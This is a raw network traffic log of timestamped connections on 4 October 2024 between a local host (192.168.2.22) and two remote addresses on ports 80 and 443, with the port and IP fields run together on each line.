                                                                                                                                            Oct 4, 2024 11:55:55.050513029 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.050513029 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.050585032 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.050642014 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.050643921 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.050699949 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.050745964 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.050760984 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.050775051 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.050813913 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.050813913 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051007032 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051022053 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051035881 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051049948 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051064014 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051069975 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051078081 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051090956 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051121950 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051121950 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051292896 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051347017 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051409960 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051424980 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051467896 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051567078 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051580906 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051594019 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051610947 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051624060 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051656961 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051656961 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051853895 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051867962 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051882029 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051897049 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.051912069 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051961899 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.051961899 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.052289963 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.052311897 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.052326918 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.052346945 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.052378893 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.052378893 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.052467108 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.052484035 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.052498102 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.052520990 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.052546024 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.271342039 CEST8049166192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.271502972 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.359509945 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:55.359565020 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.359630108 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:55.364430904 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.364479065 CEST4916680192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:55.388386011 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:55.388431072 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.236498117 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.236711979 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.294389963 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.294418097 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.294694901 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.294744968 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.580759048 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.623405933 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.770370960 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.770433903 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.770433903 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.770478010 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.790635109 CEST49167443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:55:56.790657043 CEST44349167213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.859823942 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:56.864944935 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:56.865041018 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:56.865428925 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:56.872039080 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341001987 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341033936 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341049910 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341135025 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341150045 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341166019 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341180086 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341195107 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341243029 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.341300964 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.341407061 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341422081 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.341469049 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.346251011 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.346266031 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.346282959 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.346316099 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.346350908 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.348222017 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.429600000 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429645061 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429681063 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429682970 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.429714918 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429724932 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.429724932 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.429812908 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.429831028 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429877996 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.429893970 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429925919 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.429944038 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430018902 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.430048943 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430051088 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.430069923 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430093050 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430778980 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.430831909 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.430840015 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430864096 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.430882931 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430907011 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.430928946 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.430983067 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.431421995 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.431474924 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.431479931 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.431521893 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.431529045 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.431582928 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.431583881 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.431617022 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.431634903 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.431655884 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.432358980 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.432400942 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.432411909 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.432435036 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.432446003 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.432477951 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.432540894 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.432574034 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.432586908 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.432616949 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.434545040 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.434596062 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.434611082 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.434639931 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518208027 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518263102 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518295050 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518399954 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518404961 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518404961 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518404961 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518434048 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518455029 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518475056 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518522978 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518575907 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518579006 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518621922 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518695116 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518728018 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518755913 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518759966 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518773079 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518794060 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518798113 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518830061 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.518850088 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518872976 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.518966913 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519025087 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519028902 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519062042 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519095898 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519113064 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519131899 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519236088 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519298077 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519311905 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519344091 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519376040 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519423962 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519452095 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519499063 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519514084 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519531965 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519551992 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519567013 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519582987 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519603968 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519736052 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519767046 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519797087 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519799948 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519826889 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519844055 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519860983 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.519920111 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.519978046 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520009995 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520036936 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520052910 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520173073 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520204067 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520231962 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520236015 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520248890 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520270109 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520273924 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520327091 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520477057 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520509958 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520538092 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520541906 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520554066 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520575047 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520577908 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520608902 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520633936 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520642042 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520652056 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520693064 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520804882 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520863056 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520912886 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520945072 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.520970106 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.520987988 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.521009922 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.521040916 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.521070957 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.521087885 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.521225929 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.521256924 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.521285057 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.521289110 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.521301985 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.521322012 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.521326065 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.521383047 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.523286104 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.523350000 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.607208014 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607274055 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607306957 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607338905 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607372999 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607429981 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607435942 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.607464075 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607501030 CEST8049168192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:57.607517004 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.607517004 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.607649088 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:55:57.607649088 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:00.291174889 CEST4916880192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.296093941 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.302587986 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.302664995 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.302773952 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.308190107 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.781810045 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.781868935 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.781903028 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.781934977 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.781987906 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.781997919 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.781997919 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782020092 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.782022953 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782041073 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782053947 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.782077074 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782088995 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.782109022 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782126904 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.782131910 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782160997 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.782180071 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.782206059 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.783874035 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.787516117 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.787549019 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.787576914 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.787583113 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.787599087 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.787611961 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.787625074 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.787656069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.870404005 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870452881 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870466948 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870466948 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.870481014 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870491028 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.870497942 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870503902 CEST4916980192.168.2.22192.3.220.20
